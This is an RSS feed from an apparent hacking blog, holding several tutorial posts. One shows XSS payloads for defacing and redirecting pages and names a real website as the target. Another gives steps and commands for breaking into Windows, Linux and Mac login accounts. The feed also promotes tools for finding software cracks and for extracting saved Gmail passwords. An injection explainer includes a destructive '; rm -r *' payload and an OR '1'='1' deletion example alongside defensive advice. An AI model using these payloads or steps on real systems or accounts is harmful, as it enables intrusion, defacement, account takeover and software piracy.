<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Cracking</title>
	<atom:link href="http://www.hungry-hackers.com/category/cracking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>XSS Cross Site Scripting Attack</title>
		<link>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html</link>
		<comments>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html#comments</comments>
		<pubDate>Wed, 22 Sep 2010 15:18:41 +0000</pubDate>
		<dc:creator>rafay</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1662</guid>
		<description><![CDATA[Previously I wrote about Remote File Inclusion vulnerability, However Ashik asked me to make another guest post on any topic related to Hacking as he was really busy, so I though to demonstrate another type of website hacking attack called Cross Site Scripting attack, a.k.a. XSS these vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.jpg"><img class="alignleft size-full wp-image-1674" title="xss" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.jpg" alt="" width="176" height="134" /></a>Previously I wrote about <a title=" Hack a Website Using Remote File Inclusion" href="http://www.hungry-hackers.com/2010/08/hack-a-website-using-remote-file-inclusion.html" target="_blank">Remote File Inclusion vulnerability</a>, However  Ashik asked me to make another guest post on any topic related to  Hacking as he was really busy, so I though to demonstrate another type  of website hacking attack called Cross Site Scripting attack,a.k.a. XSS. XSS  vulnerabilities occur due to weak coding of the web applications. Once  the hacker finds this vulnerability he/she injects malicious  codes(Usually in web forms) to steal session cookies and later the  hacker uses those cookies to gain access to sensitive page content.</p>
<p>Xss Cross Site Scripting may be classified in two types:</p>
<p><strong>1.</strong>Persistent XSS</p>
<p><strong>2.</strong>Non Persistent XSS</p>
<p>In order to demonstrate a XSS attack I will take an example of a website:</p>
<blockquote><p><a href="http://www.redwrappings.co.in/">http://www.redwrappings.co.in</a></p></blockquote>
<p><strong>Checking the venerability </strong></p>
<p>The simplest way to check the vulnerability is to enter the following code in the any web form present on the website</p>
<blockquote><p><strong>&lt;script&gt;alert(&#8220;XSS&#8221;)&lt;/script&gt;</strong></p></blockquote>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp"><img class="size-full wp-image-1666 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss.bmp" alt="xss cross site scripting" /></a></p>
<p>Once the attacker inserts the code A dialog box like the below one will appear:</p>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp"><img class="size-full wp-image-1667 aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/09/xss1.bmp" alt="" /></a></p>
<p><strong>Defacement</strong></p>
<p style="text-align: justify;">Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:</p>
<blockquote><p><strong>&lt;html&gt;&lt;body&gt;&lt;IMG SRC=&#8221;http://site.com/yourDefaceIMAGE.png&#8221;&gt;&lt;/body&gt;&lt;/html&gt;</strong></p></blockquote>
<p>Where <strong>http://site.com/yourDefaceIMAGE.png </strong>is the defacement image</p>
<p><strong>Inserting Flash Videos</strong></p>
<p>The attacker can also insert flash videos by entering the following code in any web form present on the website</p>
<p><strong>Redirection</strong></p>
<p style="text-align: justify;">The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:</p>
<blockquote><p><strong>&lt;script&gt;window.open( &#8220;http://www.google.com/&#8221; )&lt;/script&gt;</strong></p></blockquote>
<p style="text-align: justify;"><strong>Stealing Cookies</strong></p>
<p style="text-align: justify;">Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles <img src='http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information</p>
<p style="text-align: justify;"><strong>About the Author</strong></p>
<p style="text-align: justify;">This is a guest post by Rafay baloch. Rafay Baloch is a the founder of <a title="Rafay Hacking Articles" href="http://rafayhackingarticles.blogspot.com/" target="_blank">Rafay Hacking Articles</a> and the writer of the book <a href="http://www.hungry-hackers.com/2010/08/a-beginners-guide-to-ethical-hacking.html"><strong>A Beginners guide To Ethical Hacking</strong></a><a href="../2010/08/www.hacking-book.com" target="_blank"></a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1662&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>How to Hack Password of any Operating System</title>
		<link>http://www.hungry-hackers.com/2009/12/how-to-hack-password-of-any-operating-system.html</link>
		<comments>http://www.hungry-hackers.com/2009/12/how-to-hack-password-of-any-operating-system.html#comments</comments>
		<pubDate>Sat, 26 Dec 2009 16:14:17 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Botnets]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Linux Hacking]]></category>
		<category><![CDATA[Password Recovery]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Windows Hacking]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1198</guid>
		<description><![CDATA[One thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems.  Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2009/12/logo.png"><img class="alignleft size-full wp-image-1199" title="logo" src="http://www.hungry-hackers.com/wp-content/uploads/2009/12/logo.png" alt="" width="147" height="110" /></a>One thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems. Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.</p>
<h3 style="text-align: justify;">Windows</h3>
<p style="text-align: justify;">Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful  program is Ophcrack, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.</p>
<p style="text-align: justify;">Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit.</p>
<p style="text-align: justify;">The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.</p>
<p style="text-align: justify;">You can download OphCrack from the following link:</p>
<blockquote style="text-align: justify;"><p>http://ophcrack.sourceforge.net/</p></blockquote>
<h3 style="text-align: justify;">Linux</h3>
<p style="text-align: justify;">Linux is an operating system which is quickly gaining popularity in mainstream, but not so common that you’re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is OS X.</p>
<p style="text-align: justify;">To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.</p>
<p style="text-align: justify;">You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for.</p>
<h3 style="text-align: justify;">Mac</h3>
<p style="text-align: justify;">Finally we take on Mac&#8217;s OS X which as we said earlier is based on Unix and is difficult to change password compared to Linux but nothing is  impossible to be hacked.</p>
<p style="text-align: justify;">The easiest method would be to use Ophcrack on this also as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.</p>
<p style="text-align: justify;">If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up, select UTILITIES &gt; RESET PASSWORD. Choose a new password and then use that to log in.</p>
<p style="text-align: justify;">If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:</p>
<p style="text-align: justify;"><strong>fsck -fy</strong></p>
<p style="text-align: justify;"><strong>mount -uw /</strong></p>
<p style="text-align: justify;"><strong>launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist</strong></p>
<p style="text-align: justify;"><strong>dscl . -passwd /Users/UserName newpassword</strong></p>
<p style="text-align: justify;">That’s it. Now that the password is reset, you can login.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1198&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/12/how-to-hack-password-of-any-operating-system.html/feed</wfw:commentRss>
		<slash:comments>55</slash:comments>
		</item>
		<item>
		<title>Search Cracks, Serials or Keygens on the go</title>
		<link>http://www.hungry-hackers.com/2009/05/search-cracks-serials-keygens-on-the-go.html</link>
		<comments>http://www.hungry-hackers.com/2009/05/search-cracks-serials-keygens-on-the-go.html#comments</comments>
		<pubDate>Sat, 16 May 2009 18:11:08 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Freeware]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Cracks]]></category>
		<category><![CDATA[Keygen]]></category>
		<category><![CDATA[Serials]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=632</guid>
		<description><![CDATA[Are you tired of searching the Internet for Cracks, Serials and Keygens  with the Risk of Getting infected by Trojans and Worms? Whatever is your reason - illegally install, not genuine, no money to pay, forget purchased original valid serial key, lazy to register product, want to extend trial limit and etc - if you search for cracks or serials online, you will likely end up searching, finding, locating and downloading from a few crack sites or cracks search engines. However, these crack sites contain lots of toolbars, popups, spyware, adware, malware or unwanted components that try to infect your computer. Craagle is an utility that helps you to avoid these nuisance.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2009/05/craagle.gif"><img class="alignleft size-full wp-image-633" title="craagle" src="http://www.hungry-hackers.com/wp-content/uploads/2009/05/craagle.gif" alt="craagle" width="273" height="256" /></a>Are you tired of searching the Internet for Cracks, Serials and Keygens  with the Risk of Getting infected by Trojans and Worms? Whatever is your reason &#8211; illegally install, not genuine, no money to pay, forget purchased original valid serial key, lazy to register product, want to extend trial limit and etc &#8211; if you search for cracks or serials online, you will likely end up searching, finding, locating and downloading from a few crack sites or cracks search engines. However, these crack sites contain lots of toolbars, popups, spyware, adware, malware or unwanted components that try to infect your computer. Craagle is an utility that helps you to avoid these nuisance.</p>
<p>Craagle is a free downloadable standalone meta search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with. It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.</p>
<p>Craagle also supports usage of proxy server to bypass some sites that have Day Limit or daily usage limit. Craagle source code has over 100,000 characters (engine only, excluded GUI).</p>
<p style="text-align: justify;"><strong>How to install?</strong></p>
<p style="text-align: justify;">There is no need to install the program as the exe is portable and can be run without any kind of installation process. To run the program just double click the craagle.exe file. To download <a title="Craagle" href="#download">click here</a>.</p>
<p style="text-align: justify;"><strong>How to search for cracks, serials or keygen in Craagle?</strong></p>
<p style="text-align: justify;">The user interface of Craagle is as follows:</p>
<p style="text-align: justify;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2009/05/craagle_serials.gif"><img class="aligncenter size-full wp-image-635" title="craagle_serials" src="http://www.hungry-hackers.com/wp-content/uploads/2009/05/craagle_serials.gif" alt="craagle_serials" width="597" height="465" /></a></p>
<p style="text-align: justify;">Follow the steps:</p>
<ol>
<li>Type the name of the software.</li>
<li>Select whether you want crack, serial or keygen.</li>
<li>You may also select a specific website you want to search.</li>
<li>Press Search.</li>
<li>Select the version of the software.</li>
<li>Right click and press Download to get the Key.</li>
<li>The Key will be displayed at the bottom as shown in the above figure.</li>
<li>Activate the software using the given key and Enjoy</li>
</ol>
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>Risks:</strong></p>
<p style="text-align: justify;">Craagle is detected by many antivirus and antispyware software as containing Adware, so use it at your own risk. When Craagle is installed, it creates the following files in the current folder: proxy.txt, Options.ini or Craagle.ini.</p>
<p><strong>Crack Sites Supported:</strong></p>
<ul>
<li>Cracks.Am</li>
<li> KeyGen.Us</li>
<li> AllCracks.Net</li>
<li> Andr.Net,</li>
<li>Crack.Ms</li>
<li>Crackz.Ws</li>
<li>CrackArchive.Com</li>
<li>CrackDb.Com</li>
<li>CrackzPlanet.Com</li>
<li>CrackWay.Com</li>
<li>MsCracks.Com</li>
<li>CrackPortal.Com</li>
<li>TheCracks.Us</li>
<li>KeyGen.Ru</li>
</ul>
<p><strong>Serial Sites Supported:</strong></p>
<ul>
<li>Seriall.Com</li>
<li>FreeSerials.Com</li>
<li>SerialSite.Com</li>
<li>Serials.Ws</li>
<li>Andr.Net</li>
<li>SerialKey.Net</li>
<li>SerialArchive.Com</li>
<li>CrackzPlanet.Com</li>
<li>MsCracks.Com</li>
<li>CrackPortal.Com</li>
<li>KeyGen.Name</li>
<li>TheKeys.Ws</li>
<li>FreeSerials.Ws</li>
<li>FreeSerials.Spb.Ru</li>
<li>Serial.220volt.Info</li>
<li>SerialCodes.Net</li>
</ul>
<p><a name="download"></a><br />
<strong>Download</strong></p>
<p>Link : <a title="Craagle" href="http://www.easy-share.com/1905219519/Craagle-hungry-hackers.com.rar" target="_blank">http://www.easy-share.com/1905219519/Craagle-hungry-hackers.com.rar</a></p>
<p>Password : <strong>hungry-hackers.com</strong></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=632&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2009/05/search-cracks-serials-keygens-on-the-go.html/feed</wfw:commentRss>
		<slash:comments>25</slash:comments>
		</item>
		<item>
		<title>How to recover Orkut password?</title>
		<link>http://www.hungry-hackers.com/2008/12/how-to-recover-orkut-password.html</link>
		<comments>http://www.hungry-hackers.com/2008/12/how-to-recover-orkut-password.html#comments</comments>
		<pubDate>Mon, 15 Dec 2008 20:30:21 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Internet News]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Orkut]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[Recover]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=407</guid>
		<description><![CDATA[Orkut is the highly successful social networking site in Brazil, India, and Pakistan. Orkut is much more famous than any of the other social networking sites such as Facebook and MySpace in these third world countries. The Orkut demographics show the penetration of this social networking tool with above 51% from Brazil (http://www.orkut.co.in/Main#MembersAll.aspx ). Developed by Orkut Büyükkökten  and later bough by Google, this social networking tool is growing far greater than any one else.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Orkut is the highly successful social networking site in Brazil, India, and Pakistan. Orkut is much more famous than any of the other social networking sites such as Facebook and MySpace in these third world countries. The Orkut demographics show the penetration of this social networking tool with above 51% from Brazil (<a href="http://www.orkut.co.in/Main#MembersAll.aspx" target="_blank">http://www.orkut.co.in/Main#MembersAll.aspx</a> ). Developed by Orkut Büyükkökten  and later bough by Google, this social networking tool is growing far greater than any one else.</p>
<p style="text-align: justify;">With its popularity grows the need of hacking into some ones Orkut account. We are getting so many comments on several pages in this website on how to break into an Orkut account; how to break Orkut password etc.  As always our humble reply, we don’t endorse hacking. We will not help anyone out to break into Orkut account nor provide any help if they have forgotten the passwords.</p>
<p style="text-align: justify;">One thing people forget is that Orkut just like any other web based service store the password in encrypted format and just not possible to figure out the password even with the help of employees who are working there. How is it possible? Without going into technical details, let us explain things in a simple way.</p>
<p style="text-align: justify;">When you register for a web based service you provide the password; one thing most trusted websites does is that it encrypt the password provided by you. The encryption is not reversible ie no one can decode the string back to the original format.</p>
<p style="text-align: justify;">Suppose you have the password “MyPassword” this password is stored in the Orkut (or any other server) in encrypted format… something like – MyPassword =&gt; khkjhd877e8q78e8634but3874@63. There are several encryption techniques available like MD5, SHA etc. These encryption algorithms are not reversible ie you can convert MyPassword to khkjhd877e8q78e8634but3874@63 but khkjhd877e8q78e8634but3874@63 can’t be converted back to MyPassword.</p>
<p style="text-align: justify;">When ever you enter the user name and password, the website convert your password into Md5 or sha or what ever it is and cross check.  So not even an Google employee can retrieve your password. Well, it can be reset.</p>
<p style="text-align: justify;">Orkut passwords could be compromised only if you are</p>
<ul style="text-align: justify;">
<li>Using a computer with a keylogger installed</li>
<li>Using a computer affected with some Trojan or virus</li>
<li>Using other websites where you have used the same password and which is not encrypted</li>
</ul>
<p style="text-align: justify;">So next time before thinking about hijacking the girl friends Orkut account, remember it’s not that easy.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=407&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/12/how-to-recover-orkut-password.html/feed</wfw:commentRss>
		<slash:comments>53</slash:comments>
		</item>
		<item>
		<title>Recover your Forgotten Passwords for Free</title>
		<link>http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html#comments</comments>
		<pubDate>Mon, 24 Nov 2008 08:06:02 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Decryption]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Password Recovery]]></category>
		<category><![CDATA[Spoofing]]></category>
		<category><![CDATA[GMail]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[Recovery]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=383</guid>
		<description><![CDATA[I have got many Comments and Emails Saying that they have Forgot the Password of some email Account and now they want to get it back. Here is the Solution  to all your Emails and Comments. Gmail Password Recovery is a Software by which you can get your lost Passwords back and this is Not A JOKE. I have personally Tried and Tested it.]]></description>
			<content:encoded><![CDATA[<p>I have got many Comments and Emails Saying that they have Forgot the Password of some email Account and now they want to get it back. Here is the Solution  to all your Emails and Comments. Gmail Password Recovery is a Software by which you can get your lost Passwords back and this is True. I have personally tried and Tested it.</p>
<p>Gmail Password Recovery is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords:</p>
<ul>
<li>Google Talk</li>
<li>Gmail Notifier</li>
<li>Google Desktop</li>
<li>Picasa</li>
<li>Google Photos Screensaver</li>
<li> Internet Explorer</li>
<li>Mozilla Firefox</li>
</ul>
<p>This Cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password. In any case, if you are trying to recover the password you have long forgotten, download Gmail Password Recovery.<br />
[eminimall]<br />
<strong>Note: </strong>The Passwords Shown in the Image have been Changed so Please Don&#8217;t Try it. They are just for Demonstration</p>
<p><strong>Download Link:</strong></p>
<blockquote><p>http://w18.easy-share.com/1702541173.html</p></blockquote>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=383&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html/feed</wfw:commentRss>
		<slash:comments>26</slash:comments>
		</item>
		<item>
		<title>Are you Vulnerable to Shell or SQL Injection?</title>
		<link>http://www.hungry-hackers.com/2008/11/are-you-vulnerable-to-shell-or-sql-injection.html</link>
		<comments>http://www.hungry-hackers.com/2008/11/are-you-vulnerable-to-shell-or-sql-injection.html#comments</comments>
		<pubDate>Sun, 23 Nov 2008 09:17:24 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Database Hacking]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=380</guid>
		<description><![CDATA[Injection attacks can be very easy to discover and exploit, but they can also be extremely obscure. The consequences can also run the entire range of severity, from trivial to complete system compromise or destruction. In any case, the use of external calls is quite widespread, so the likelihood of a web application having a command injection flaw should be considered high.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Injection flaws allow attackers to relay malicious code through a web application to another system. These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e., SQL injection). Whole scripts written in perl, python, and other languages can be injected into poorly designed web applications and executed. Any time a web application uses an interpreter of any type there is a danger of an injection attack.</p>
<p style="text-align: justify;">Injection attacks can be very easy to discover and exploit, but they can also be extremely obscure. The consequences can also run the entire range of severity, from trivial to complete system compromise or destruction. In any case, the use of external calls is quite widespread, so the likelihood of a web application having a command injection flaw should be considered high.</p>
<p style="text-align: justify;"><strong>Shell Commands</strong></p>
<p style="text-align: justify;"><span lang="en-US">Many web applications use operating system features and external programs to perform their functions. Sendmail is probably the most frequently invoked external program, but many other programs are used as well. When a web application passes information from an HTTP request through to the command line, it must be carefully scrubbed. This also applies when opening files in the file system. Otherwise, the attacker can inject special (meta) characters, malicious commands, or command modifiers into the information and the web application will blindly pass these on to the external system for execution.</span></p>
<p style="text-align: justify;"><span lang="en-US"><strong>SQL</strong></span></p>
<p style="text-align: justify;"><span lang="en-US">SQL injection is a particularly widespread and dangerous form of attack. To exploit a SQL injection flaw, the attacker must find a parameter that the web application passes through to a database. By carefully embedding malicious SQL commands into the content of the parameter, the attacker can trick the web application into forwarding a malicious query to the database. These attacks are not difficult to attempt and more tools are emerging that scan for these flaws. The consequences are particularly damaging, as an attacker can obtain, corrupt, or destroy database contents.</span></p>
<h4 style="text-align: justify;">Environments Affected</h4>
<p style="text-align: justify;">Every web application environment allows the execution of external commands such as system calls, shell commands, and SQL requests. The susceptibility of an external call to command injection depends on how the call is made and the specific component that is being called, but almost all external calls can be attacked if the web application is not properly coded.</p>
<p style="text-align: justify;">Some environment specific considerations:</p>
<ul style="text-align: justify;">
<li>MySQL &#8211; 	older mysql libraries only processes one statement at a time when 	you pass it a query. Newer mysql libraries (e.g., mysql in PHP) 	will process multiple SQL commands in one query</li>
<li>Oracle &#8211; 	most Oracle client libraries support variable binding. This is the 	best way to avoid SQL injection.</li>
<li>Perl &#8211; 	check for shell injection when you open a file if the filename is 	derived from user input</li>
</ul>
<h4 style="text-align: justify;">Examples:</h4>
<ul style="text-align: justify;">
<li>
<p style="margin-top: 0.03in; margin-bottom: 0.08in;">A malicious 	parameter could modify the actions taken by a system call that 	normally retrieves the current user&#8217;s file to access another 	user&#8217;s file (e.g., by including path traversal &#8220;../&#8221; 	characters as part of a filename request).</p>
</li>
<li>
<p style="margin-top: 0.03in; margin-bottom: 0.08in;">Additional 	commands could be tacked on to the end of a parameter that is passed 	to a shell script to execute an additional shell command (e.g., &#8220;; 	rm -r *&#8221;) along with the intended command.</p>
</li>
<li>
<p style="margin-top: 0.03in; margin-bottom: 0.08in; page-break-inside: avoid;">SQL queries could be modified by adding additional &#8216;constraints&#8217; 	to a where clause (e.g., &#8220;OR 1=1&#8243;) to gain access to or modify 	unauthorized data.</p>
</li>
</ul>
<blockquote style="text-align: justify;"><p><strong>Example:</strong></p>
<ul> DELETE FROM CRITICALTABLE WHERE USER=&#8217;$VAR&#8217;</ul>
<p>where the user enters</p>
<ul> HACKER&#8217; OR &#8217;1&#8242;=&#8217;1</ul>
<p>Notice the mismatched quotes! Inserting this into the 	SQL statement, we&#8217;d get:</p>
<ul> DELETE FROM CRITICALTABLE WHERE USER=&#8217;BADGUY&#8217; OR &#8217;1&#8242;=&#8217;1&#8242;</ul>
<p>This would delete all the information in the critical table.</p></blockquote>
<h4 style="text-align: justify;">How to Determine If You Are Vulnerable</h4>
<p style="text-align: justify;">The best way to determine if you are vulnerable to command line or SQL injection attacks is to search the source code for all calls to external resources (e.g., system, exec, fork, Runtime.exec, SQL queries, or whatever the syntax is for making requests to interpreters in your environment). Note that many languages have multiple ways to run external commands. Developers should review their code and search for all places where input from an HTTP request could possibly make its way into any of these calls. You should carefully examine each of these calls to be sure that the protection steps outlined below are followed.</p>
<h4 style="text-align: justify;">How to Protect Yourself</h4>
<p style="text-align: justify;">The simplest way to protect against injection is to avoid accessing external interpreters wherever possible. For many shell commands and some system calls, there are language specific libraries that perform the same functions. Using such libraries does not involve the operating system shell interpreter, and therefore avoids a large number of problems with shell commands.</p>
<ul style="text-align: justify;">
<li>Use bind variables where ever possible. If 	not, escape all user variables which be used in a SQL statement or 	on the command line.</li>
<li>In Coldfusion, use variable binding by using 	the CFQueryParam Tag within your CFQuery tags.</li>
<li>In Perl, prepare your statements using 	variable binding and then pass the parameters when executing the 	query:
<ul> $cursor = $db-&gt;prepare(&#8220;DELETE FROM CRITICALTABLE WHERE USER=?&#8221;);<br />
$cursor-&gt;execute($user);</ul>
</li>
<li>Use pattern matching to verify user input is 	an expected value. If input is not what is expected, throw an error. 	Error messages should be generic.  <a href="http://www.upenn.edu/computing/security/swat/SWAT_Top_Ten_A7.php"></a></li>
<li>Turn off/control debug messages to avoid 	giving an attacker potentially useful information.</li>
<li>Database level: Limit access to the web 	account that is accessing the database.  Write procedures to 	insert records and update data rather than give the application 	direct access to the tables;  Limit application to READ-only 	access where possible &#8211; at user level as well as database level.</li>
<li>Reuse previously tested code wherever 	possible.</li>
</ul>
<p style="text-align: justify;">For those calls that you must still employ, such as calls to backend databases, you must carefully validate the data provided to ensure that it does not contain any malicious content. You can also structure many requests in a manner that ensures that all supplied parameters are treated as data, rather than potentially executable content. The use of stored procedures or prepared statements will provide significant protection, ensuring that supplied input is treated as data. These measures will reduce, but not completely eliminate the risk involved in these external calls. You still must always validate such input to make sure it meets the expectations of the application in question.</p>
<p style="text-align: justify;">Another strong protection against command injection is to ensure that the web application runs with only the privileges it absolutely needs to perform its function. So you should not run the webserver as root or access a database as DBADMIN, otherwise an attacker can abuse these administrative privileges granted to the web application. Some of the J2EE environments allow the use of the Java sandbox, which can prevent the execution of system commands.</p>
<p style="text-align: justify;">If an external command must be used, any user information that is being inserted into the command should be rigorously checked. Mechanisms should be put in place to handle any possible errors, timeouts, or blockages during the call.</p>
<p style="text-align: justify;">All output, return codes and error codes from the call should be checked to ensure that the expected processing actually occurred. At a minimum, this will allow you to determine that something has gone wrong. Otherwise, the attack may occur and never be detected.</p>
<p style="text-align: justify;">The OWASP Filters project is producing reusable components in several languages to help prevent many forms of injection. OWASP has also released CodeSeeker, an application level firewall.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=380&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/11/are-you-vulnerable-to-shell-or-sql-injection.html/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Create a CookieLogger and Hack any Account</title>
